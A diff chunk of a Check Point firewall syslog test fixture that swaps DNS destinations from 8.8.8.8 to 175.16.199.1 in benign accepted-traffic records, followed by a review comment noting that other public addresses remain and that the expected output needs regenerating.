FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64329"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T13:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ad,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62284"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43379"; xlatesrc:"0.0.0.0"] 
@@ -412,7 +412,7 @@ <134>1 2020-03-29T14:29:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59101"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T14:29:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T14:29:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36394"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36394"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43218"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10085"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46212"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63836"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43392"; xlatesrc:"0.0.0.0"] 
@@ -619,7 +619,7 @@ <134>1 2020-03-29T15:11:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80baae,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:11:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab0,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T15:11:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab2,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58575"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58575"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43978"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10122"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51110"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43411"; xlatesrc:"0.0.0.0"] 
@@ -660,7 +660,7 @@ <134>1 2020-03-29T15:16:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcc,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46147"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:16:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T15:16:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60219"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60219"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51204"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10126"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58217"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64692"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43415"; xlatesrc:"0.0.0.0"] 
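Review bot: The substitution of `dst:"8.8.8.8"` with `dst:"175.16.199.1"` is applied consistently in this hunk and in the hunks at @@ -850, @@ -865, @@ -873 and @@ -964, but the surrounding context lines still carry other non-private destinations (`192.124.249.31`, `192.124.249.41`, `192.124.249.36`, `104.81.142.43`), so the fixture is not uniformly scrubbed of real-world addresses after the change. The reason for the substitution is not visible in these hunks; if the goal is to keep the sample traffic off a specific live address (for example so that any geo or reputation enrichment in the pipeline stays deterministic), the remaining public destinations in the same hunks may warrant the same treatment. Changing the `dst` field also changes the parsed output, so the expected-output file that accompanies this log presumably needs regenerating; that file is not part of this chunk. The hunks at the start and end of this chunk begin or end outside the visible range and are not reviewed here.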
@@ -850,7 +850,7 @@ <134>1 2020-03-29T15:56:02Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c512,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43258"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T15:56:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c513,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T15:56:04Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c514,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
